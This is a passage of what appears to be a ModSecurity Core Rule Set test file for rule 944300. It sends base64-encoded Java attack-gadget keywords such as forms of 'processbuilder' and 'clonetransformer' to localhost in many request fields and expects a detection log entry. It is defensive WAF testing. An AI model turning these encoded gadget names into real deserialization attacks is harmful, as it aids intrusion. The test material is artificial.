Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-44 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=HByb2Nlc3NidWlsZGVy" output: log_contains: "id \"944300\"" - test_title: 944300-45 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy=test" output: log_contains: "id \"944300\"" - test_title: 944300-46 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=HByb2Nlc3NidWlsZGVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-47 desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: HByb2Nlc3NidWlsZGVy=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-48 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: HByb2Nlc3NidWlsZGVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-49 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-50 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy" output: log_contains: "id \"944300\"" - test_title: 944300-51 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy" output: log_contains: "id \"944300\"" - test_title: 944300-52 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=HByb2Nlc3NidWlsZGVy" output: log_contains: "id \"944300\"" - test_title: 944300-53 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" output: log_contains: "id \"944300\"" - test_title: 944300-54 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-55 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Bwcm9jZXNzYnVpbGRlcg" output: log_contains: "id \"944300\"" - test_title: 944300-56 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg=test" output: log_contains: "id \"944300\"" - test_title: 944300-57 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Bwcm9jZXNzYnVpbGRlcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-58 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Bwcm9jZXNzYnVpbGRlcg=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-59 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Bwcm9jZXNzYnVpbGRlcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-60 desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-61 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg" output: log_contains: "id \"944300\"" - test_title: 944300-62 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg" output: log_contains: "id \"944300\"" - test_title: 944300-63 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Bwcm9jZXNzYnVpbGRlcg" output: log_contains: "id \"944300\"" - test_title: 944300-64 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" output: log_contains: "id \"944300\"" - test_title: 944300-65 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-66 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-67 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" output: log_contains: "id \"944300\"" - test_title: 944300-68 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-69 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-70 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Y2xvbmV0cmFuc2Zvcm1lcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-71 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-72 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-73 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-74 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-75 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" output: log_contains: "id \"944300\"" - test_title: 944300-76 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-77 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=GNsb25ldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-78 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI=test" output: log_contains: "id \"944300\"" - test_title: 944300-79 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=GNsb25ldHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-80 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: GNsb25ldHJhbnNmb3JtZXI=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-81 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: GNsb25ldHJhbnNmb3JtZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-82 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-83 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-84 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-85 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=GNsb25ldHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-86 desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" output: log_contains: "id \"944300\"" - test_title: 944300-87 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-88 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=BjbG9uZXRyYW5zZm9ybWVy" output: log_contains: "id \"944300\"" - test_title: 944300-89 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 